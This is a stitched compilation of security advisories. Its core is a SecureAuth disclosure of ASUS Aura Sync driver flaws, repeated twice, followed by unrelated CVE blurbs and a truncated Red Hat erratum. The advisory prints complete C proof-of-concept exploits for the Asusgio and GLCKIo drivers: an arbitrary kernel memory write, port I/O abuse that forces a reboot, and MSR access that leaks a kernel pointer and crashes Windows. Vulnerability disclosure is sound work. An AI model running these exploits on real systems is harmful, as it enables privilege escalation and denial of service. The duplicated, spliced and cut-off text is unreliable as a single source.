IOCTL_ASIO_PORTREADB 0xA0406400 #define IOCTL_ASIO_PORTWRITEB 0xA040A440 HANDLE ghDriver = 0; typedef BYTE(*fnPMIOReadB)(WORD port); typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value); #pragma pack (push,1) typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnPMIOReadB pPMIOReadB; fnPMIOWriteB pPMIOWriteB; } AutoConfigStruct; AutoConfigStruct gConfig = { 0 }; enum DriverEnum { ASIO = 1, GLCKIO, }; typedef struct _ASIO_PORTIO_STRUCT { DWORD port; ULONG64 value; } ASIO_PORTIO_STRUCT; typedef struct _GLCKIO_PORTIO_STRUCT { WORD port; DWORD value; DWORD datalen; } GLCKIO_PORTIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ BYTE outbuffer[0x30] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ BYTE GLCKIO_PMIOReadB(WORD port) { GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1}; IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10) } BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value) { GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 }; IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10) } BYTE ASIO_PMIOReadB(WORD port) { ASIO_PORTIO_STRUCT inbuffer = { port, 0 }; IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4) } BYTE ASIO_PMIOWriteB(WORD port, BYTE value) { ASIO_PORTIO_STRUCT inbuffer = { port, value }; IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5) } void Reboot() { BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6; gConfig.pPMIOWriteB(0xcf9, cf9 | 2); Sleep(50); gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe); Sleep(50); } BOOL InitDriver() { char *szDeviceNames[] = { "\\\\.\\Asusgio" , "\\\\.\\GLCKIo" }; BYTE i = 0; for (i = 0; i<2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; } gConfig.DriverIndex = i+1; memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1); break; } switch (gConfig.DriverIndex) { case DriverEnum::ASIO: { gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB; gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB; } break; case DriverEnum::GLCKIO: { gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB; } gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB; break; default: break; } return gConfig.DriverIndex ? TRUE : FALSE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (PMIO access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver); printf("press ENTER for hard reset..."); getchar(); Reboot(); CloseHandle(ghDriver); } -----/ *7.3. *MSR Register access** [CVE-2018-18535] Asusgio exposes a functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. Proof of Concept: /----- // This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR // register value (leaks a kernel function pointer bypassing KASLR) and // then writing garbage to it (instant BSOD!) #include <windows.h> // for \\.\Asusgio #define IOCTL_ASIO_RDMSR 0xA0406458 #define IOCTL_ASIO_WRMSR 0xA040A45C HANDLE ghDriver = 0; #pragma pack (push,1) typedef struct _ASIO_MSRIO_STRUCT { DWORD reg; ULONG64 value; } ASIO_MSRIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ ULONG64 ASIO_RDMSR(DWORD reg) { ASIO_MSRIO_STRUCT inbuffer = { reg }; IOCTLMACRO(IOCTL_ASIO_RDMSR, 4) } ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value) { ASIO_MSRIO_STRUCT inbuffer = { reg, value }; IOCTLMACRO(IOCTL_ASIO_WRMSR, 12) } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", "\\\\.\\Asusgio", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (MSR access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082); printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR); printf("press ENTER for instant BSOD\n"); getchar(); a = ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222); CloseHandle(ghDriver); } -----/ *8. *Report Timeline** 2017-11-27: SecureAuth sent an initial notification to ASUS, asking for GPG keys. 2017-12-14: SecureAuth sent a second notification to ASUS. 2018-01-29: SecureAuth sent a third notification to ASUS. 2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report with technical information. 2018-01-31: SecureAuth sent Asus a draft version of the advisory. 2018-02-07: SecureAuth requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-14: SecureAuth again requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-21: Asus acknowledged SecureAuth's draft report and asked for time for internal investigations. 2018-02-21: Asus answered saying that they were planning to update Aura in April. 2018-02-21: SecureAuth thanked Asus's feedback and requested a regular contact until the Auras update. 2018-03-19: SecureAuth asked for a status update. 2018-03-26: SecureAuth asked for a status update again. 2018-03-26: SecureAuth asked Asus to confirm if this new version had been already released. 2018-04-03: SecureAuth requested a status update. 2018-04-16: SecureAuth requested a confirmation for Asus. 2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn't address the reported vulnerabilities. For that reason, SecureAuth requested a clarification about the case. In this context, SecureAuth requested a new clarification. 2018-07-03: SecureAuth requested a status update. 2018-12-18: Advisory CORE-2017-0012 published as 'user release'. *9. *References** [1] https://www.asus.com/support *10. *About SecureAuth Labs** SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com. *11. *About SecureAuth** SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com *12. *Disclaimer** The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

The GLCKIo low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes a path to write an arbitrary DWORD to an arbitrary address. ASUS Aura Sync Contains vulnerabilities related to security features.Information may be tampered with. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASUS Drivers Elevation of Privilege Vulnerabilities *1. *Advisory Information** Title: ASUS Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2017-0012 Advisory URL: http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities Date published: 2018-12-18 Date of last update: 2018-12-18 Vendors contacted: Asus Release mode: User release *2. *Vulnerability Information** Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535 *3. *Vulnerability Description** ASUS offers several drivers and utilities [1] in order to give the user more control over certain settings and functions of the motherboard. In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox, combining and controlling the LEDs of all your Aura-enabled products from a single application to achieve perfect, synchronized harmony. From motherboards and RGB strips to graphics cards and beyond, Aura Sync enables a veritable symphony of light for ultimate personalization. *4. *Vulnerable Packages** . *5. *Vendor Information, Solutions and Workarounds** The vendor did not provide fixes or workaround information. *6. *Credits** These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** Aura Sync is ASUS's command software for all their line of recent RGB lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc). The main subject of this advisory are two of the device drivers installed/loaded by the Aura Sync application. From now on addressed as "Asusgio" and "GLCKIo". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers. The following sections describe the problems found. *7.1. /----- .text:FFFFF800B09F13FE loc_FFFFF800B09F13FE: .text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38] ; CONTROLLED VALUE .text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56] ; CONTROLLED VALUE .text:FFFFF800B09F140A mov [rax], ecx ; Arbitrary DWORD sized write! .text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp] .text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4 .text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D -----/ Proof of Concept: /----- #include <windows.h> HANDLE ghDriver = 0; #define IOCTL_GLCKIO_VMWRITE 0x80102050 typedef struct _STRUCT_GLCKIO_VMWRITE { WORD unk0; DWORD unk1_1; WORD unk1_2; ULONG64 unk2; ULONG64 unk3; ULONG64 unk4; ULONG64 unk5; ULONG64 unk6; } STRUCT_GLCKIO_VMWRITE; BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value) { STRUCT_GLCKIO_VMWRITE mystructIn = { 0 }; mystructIn.unk0 = 0xf11; mystructIn.unk1_1 = value; // value mystructIn.unk5 = dest; // address STRUCT_GLCKIO_VMWRITE mystructOut = { 0 }; DWORD returned = 0; DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut), &returned, NULL); return BOOL(returned); } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n"); if (!InitDriver()) { exit(0); } printf("press ENTER for instant BSOD\n"); getchar(); ArbitraryWriteDWORD(0, 0xffffffff); CloseHandle(ghDriver); return 0; } -----/ *7.2. *Port mapped I/O access** [CVE-2018-18536] Both GLCKIo and Asusgio expose a functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. /----- // This harmless PoC only reboots the PC, much more sinister stuff // would also be possible by abusing this functionality. // Compile for 32bit!!! Asusgio apparently has a bug preventing this // functionality to work unless IoIs32bitProcess == TRUE. They set rdx // as a pointer instead of a port number on the in/out instruction... // and they ONLY do this incorrectly in the x64 process specific code.(!?) #include "stdafx.h" #include <windows.h> // for \\.\glckio #define IOCTL_GLCKIO_WRITEPORT 0x80102054 #define IOCTL_GLCKIO_READPORT 0x80102050 // for \\.\Asusgio #define IOCTL_ASIO_PORTREADB 0xA0406400 #define IOCTL_ASIO_PORTWRITEB 0xA040A440 HANDLE ghDriver = 0; typedef BYTE(*fnPMIOReadB)(WORD port); typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value); #pragma pack (push,1) typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnPMIOReadB pPMIOReadB; fnPMIOWriteB pPMIOWriteB; } AutoConfigStruct; AutoConfigStruct gConfig = { 0 }; enum DriverEnum { ASIO = 1, GLCKIO, }; typedef struct _ASIO_PORTIO_STRUCT { DWORD port; ULONG64 value; } ASIO_PORTIO_STRUCT; typedef struct _GLCKIO_PORTIO_STRUCT { WORD port; DWORD value; DWORD datalen; } GLCKIO_PORTIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ BYTE outbuffer[0x30] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ BYTE GLCKIO_PMIOReadB(WORD port) { GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1}; IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10) } BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value) { GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 }; IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10) } BYTE ASIO_PMIOReadB(WORD port) { ASIO_PORTIO_STRUCT inbuffer = { port, 0 }; IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4) } BYTE ASIO_PMIOWriteB(WORD port, BYTE value) { ASIO_PORTIO_STRUCT inbuffer = { port, value }; IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5) } void Reboot() { BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6; gConfig.pPMIOWriteB(0xcf9, cf9 | 2); Sleep(50); gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe); Sleep(50); } BOOL InitDriver() { char *szDeviceNames[] = { "\\\\.\\Asusgio" , "\\\\.\\GLCKIo" }; BYTE i = 0; for (i = 0; i<2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; } gConfig.DriverIndex = i+1; memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1); break; } switch (gConfig.DriverIndex) { case DriverEnum::ASIO: { gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB; gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB; } break; case DriverEnum::GLCKIO: { gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB; } gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB; break; default: break; } return gConfig.DriverIndex ? TRUE : FALSE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (PMIO access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver); printf("press ENTER for hard reset..."); getchar(); Reboot(); CloseHandle(ghDriver); } -----/ *7.3. *MSR Register access** [CVE-2018-18535] Asusgio exposes a functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. Proof of Concept: /----- // This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR // register value (leaks a kernel function pointer bypassing KASLR) and // then writing garbage to it (instant BSOD!) #include <windows.h> // for \\.\Asusgio #define IOCTL_ASIO_RDMSR 0xA0406458 #define IOCTL_ASIO_WRMSR 0xA040A45C HANDLE ghDriver = 0; #pragma pack (push,1) typedef struct _ASIO_MSRIO_STRUCT { DWORD reg; ULONG64 value; } ASIO_MSRIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ ULONG64 ASIO_RDMSR(DWORD reg) { ASIO_MSRIO_STRUCT inbuffer = { reg }; IOCTLMACRO(IOCTL_ASIO_RDMSR, 4) } ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value) { ASIO_MSRIO_STRUCT inbuffer = { reg, value }; IOCTLMACRO(IOCTL_ASIO_WRMSR, 12) } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", "\\\\.\\Asusgio", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (MSR access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082); printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR); printf("press ENTER for instant BSOD\n"); getchar(); a = ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222); CloseHandle(ghDriver); } -----/ *8. *Report Timeline** 2017-11-27: SecureAuth sent an initial notification to ASUS, asking for GPG keys. 2017-12-14: SecureAuth sent a second notification to ASUS. 2018-01-29: SecureAuth sent a third notification to ASUS. 2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report with technical information. 2018-01-31: SecureAuth sent Asus a draft version of the advisory. 2018-02-07: SecureAuth requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-14: SecureAuth again requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-21: Asus acknowledged SecureAuth's draft report and asked for time for internal investigations. 2018-02-21: Asus answered saying that they were planning to update Aura in April. 2018-02-21: SecureAuth thanked Asus's feedback and requested a regular contact until the Auras update. 2018-03-19: SecureAuth asked for a status update. 2018-03-26: SecureAuth asked for a status update again. 2018-03-26: SecureAuth asked Asus to confirm if this new version had been already released. 2018-04-03: SecureAuth requested a status update. 2018-04-16: SecureAuth requested a confirmation for Asus. 2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn't address the reported vulnerabilities. For that reason, SecureAuth requested a clarification about the case. In this context, SecureAuth requested a new clarification. 2018-07-03: SecureAuth requested a status update. 2018-12-18: Advisory CORE-2017-0012 published as 'user release'. *9. *References** [1] https://www.asus.com/support *10. *About SecureAuth Labs** SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com. *11. *About SecureAuth** SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com *12. *Disclaimer** The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

An issue was discovered on D-Link DVA-5592 A1_WI_20180823 devices. If the PIN of the page "/ui/cbpc/login" is the default Parental Control PIN (0000), it is possible to bypass the login form by editing the path of the cookie "sid" generated by the page. The attacker will have access to the router control panel with administrator privileges. D-Link DVA-5592 The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The D-Link DVA-5592 is a wireless router from D-Link. A security hole exists in D-Link DVA-5592 using firmware version A1_WI_20180823

In all versions of ARM Trusted Firmware up to and including v1.4, not initializing or saving/restoring the PMCR_EL0 register can leak secure world timing information. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks

The product M2M ETHERNET (FW Versions 2.22 and prior, ETH-FW Versions 1.01 and prior) is vulnerable in that an attacker can upload a malicious language file by bypassing the user authentication mechanism. M2M ETHERNET Product (FW and ETH-FW) Contains an authentication vulnerability.Information may be tampered with. ABB M2M ETHERNET is a network analysis device of Swiss ABB company. ABB M2M ETHERNET FW 2.22 and earlier versions and ETH-FW 1.01 and earlier versions have authorization issue vulnerabilities. Attackers can use this vulnerability to upload malicious language files. An attacker can exploit this issue to bypass the authentication mechanism. Successful exploits may aid in launching further attacks

A flaw was discovered in wildfly versions up to 16.0.0.Final that would allow local users who are able to execute init.d script to terminate arbitrary processes on the system. An attacker could exploit this by modifying the PID file in /var/run/jboss-eap/ allowing the init.d script to terminate any process as root. wildfly Contains a race condition vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. RedHatWildfly is a JavaEE-based lightweight open source application server from RedHat. A race condition issue vulnerability exists in RedHatWildfly16.0.0.Final and prior versions. The vulnerability stems from the improper handling of concurrent access when the network system or product is running and concurrent code needs to access shared resources mutually exclusive. Redhat Wildfly is prone to a local denial of service vulnerability. An attacker can leverage this issue to cause a denial of service condition. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Installation instructions are available from the Fuse 7.4.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.4/ 4. The References section of this erratum contains a download link (you must log in to download the update). The JBoss server process must be restarted for the update to take effect. Solution: Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications. For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1628702 - CVE-2018-14642 undertow: Infoleak in some circumstances where Undertow can serve data from a random buffer 1660263 - CVE-2019-3805 wildfly: Race condition on PID file allows for termination of arbitrary processes by local users 1666423 - CVE-2018-14720 jackson-databind: exfiltration/XXE in some JDK classes 1666428 - CVE-2018-14721 jackson-databind: server-side request forgery (SSRF) in axis2-jaxws class 1671096 - CVE-2018-12023 jackson-databind: improper polymorphic deserialization of types from Oracle JDBC driver 1671097 - CVE-2018-12022 jackson-databind: improper polymorphic deserialization of types from Jodd-db library 1677341 - CVE-2018-11307 jackson-databind: Potential information exfiltration with default typing, serialization gadget from MyBatis 1682108 - CVE-2019-3894 wildfly: wrong SecurityIdentity for EE concurrency threads that are reused 6. JIRA issues fixed (https://issues.jboss.org/): JBEAP-14861 - [GSS](7.2.z) Upgrade JBeret from 1.3.1.Final to 1.3.2.Final JBEAP-15392 - (7.2.z) Upgrade Apache CXF from 3.2.5 to 3.2.7 JBEAP-15477 - (7.2.z) Upgrade PicketLink bindings from 2.5.5.SP12-redhat-2 to 2.5.5.SP12-redhat-4 JBEAP-15478 - (7.2.z) Upgrade PicketLink from 2.5.5.SP12-redhat-2 to 2.5.5.SP12-redhat-4 JBEAP-15568 - [GSS](7.2.z) Upgrade ironjacamar from 1.4.11 Final to 1.4.15 Final JBEAP-15617 - (7.2.z) Upgrade WildFly Core from 6.0.11 to 6.0.12 JBEAP-15622 - [GSS](7.2.z) Upgrade jboss-el-api_spec from 1.0.12.Final to 1.0.13.Final JBEAP-15748 - [GSS](7.2.z) Upgrade jastow from 2.0.6.Final-redhat-00001 to 2.0.7.Final-redhat-00001 JBEAP-15805 - (7.2.z) Upgrade Hibernate ORM from 5.3.7 to 5.3.8 JBEAP-15851 - [ENG] (7.2.z) Upgrade Infinispan from 9.3.3.Final to 9.3.6.Final JBEAP-15869 - (7.2.z) Upgrade Undertow from 2.0.15 to 2.0.19 JBEAP-15876 - (7.2.z) Upgrade Artemis from 2.6.3.redhat-00014 to 2.6.3.redhat-00020 JBEAP-16025 - Upgrade yasson from 1.0.1 to 1.0.2 JBEAP-16037 - [GSS](7.2.z) Upgrade Narayana from 5.9.0.Final to 5.9.1.Final JBEAP-16086 - (7.2.z) Upgrade WildFly HTTP client from 1.0.12.Final to 1.0.13.Final JBEAP-16090 - [GSS](7.2.z) Upgrade jboss-ejb-client from 4.0.12 to 4.0.15 JBEAP-16091 - [GSS](7.2.z) Upgrade wildfly-transaction-client from 1.1.2.Final-redhat-1 to 1.1.3.Final-redhat-1 JBEAP-16112 - (7.2.z) Upgrade FasterXML Jackson from 2.9.5.redhat-2 to 2.9.8 JBEAP-16122 - [Runtimes] (7.2.z) Upgrade istack from 3.0.5.redhat-1 to 3.0.7.redhat-00001 JBEAP-16123 - [Runtimes] (7.2.x) Upgrade commons-digester from 1.8 to 1.8.1.redhat-4 JBEAP-16124 - [Runtimes] (7.2.x) Upgrade hornetq from 2.4.7.redhat-1 to 2.4.7.redhat-2 JBEAP-16125 - [Runtimes] (7.2.x) Upgrade org.jboss.genericjms from 2.0.1.Final-redhat-1 to 2.0.1.Final-redhat-00002 JBEAP-16137 - (7.2.z) (WFCORE) Upgrade FasterXML Jackson from 2.9.2 to 2.9.8 JBEAP-16146 - (7.2.z) Upgrade Elytron from 1.6.1.Final to 1.6.2.Final JBEAP-16147 - (7.2.z) Upgrade Elytron-Tool from 1.4.0 to 1.4.1.Final JBEAP-16234 - Tracker bug for the EAP 7.2.1 release for RHEL-7 JBEAP-16259 - (7.2.z) Upgrade legacy EJB Client from 3.0.2.Final-redhat-1 to 3.0.3.Final-redhat-1 JBEAP-16276 - (7.2.z) Upgrade elytron-web from 1.2.3.Final to 1.2.4.Final JBEAP-16321 - (7.2.z) HHH-13099 HHH-13283 Upgrade ByteBuddy from 1.8.17 to 1.9.5 JBEAP-16347 - (7.2.z) Upgrade jboss-logmanager from 2.1.5.Final-redhat-00001 to 2.1.7.Final JBEAP-16356 - (7.2.z) Upgrade RESTEasy from 3.6.1.SP2 to 3.6.1.SP3 JBEAP-16367 - (7.2.z) Upgrade commons-lang3 from 3.6.0-redhat-1 to 3.8-redhat-00001 JBEAP-16368 - (7.2.z) Upgrade cxf-xjc from 3.2.2.redhat-00001 to 3.2.3.redhat-00002 JBEAP-16369 - (7.2.z) Upgrade httpasyncclient from 4.1.3.redhat-2 to 4.1.4.redhat-00001 JBEAP-16381 - (7.2.z) Upgrade jboss-remoting-jmx from 3.0.0.Final to 3.0.1.Final JBEAP-16418 - (7.2.z) Upgrade Hibernate ORM from 5.3.8 to 5.3.9 JBEAP-9657 - (7.2.z) Upgrade jboss-negotiation from 3.0.4 to 3.0.5.Final-redhat-00001 7. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 8. Summary: This is a security update for JBoss EAP Continuous Delivery 18.0. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Important: Red Hat Data Grid 7.3.3 security update Advisory ID: RHSA-2020:0727-01 Product: Red Hat JBoss Data Grid Advisory URL: https://access.redhat.com/errata/RHSA-2020:0727 Issue date: 2020-03-05 CVE Names: CVE-2018-14335 CVE-2019-3805 CVE-2019-3888 CVE-2019-9512 CVE-2019-9514 CVE-2019-9515 CVE-2019-9518 CVE-2019-10173 CVE-2019-10174 CVE-2019-10184 CVE-2019-10212 CVE-2019-14379 ==================================================================== 1. Summary: An update for Red Hat Data Grid is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Red Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the Infinispan project. This release of Red Hat Data Grid 7.3.3 serves as a replacement for Red Hat Data Grid 7.3.2 and includes bug fixes and enhancements, which are described in the Release Notes, linked to in the References section of this erratum. Security Fix(es): * HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512) * HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514) * HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515) * HTTP/2: flood using empty frames results in excessive resource consumption (CVE-2019-9518) * xstream: remote code execution due to insecure XML deserialization (regression of CVE-2013-7285) (CVE-2019-10173) * infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods (CVE-2019-10174) * jackson-databind: default typing mishandling leading to remote code execution (CVE-2019-14379) * h2: Information Exposure due to insecure handling of permissions in the backup (CVE-2018-14335) * 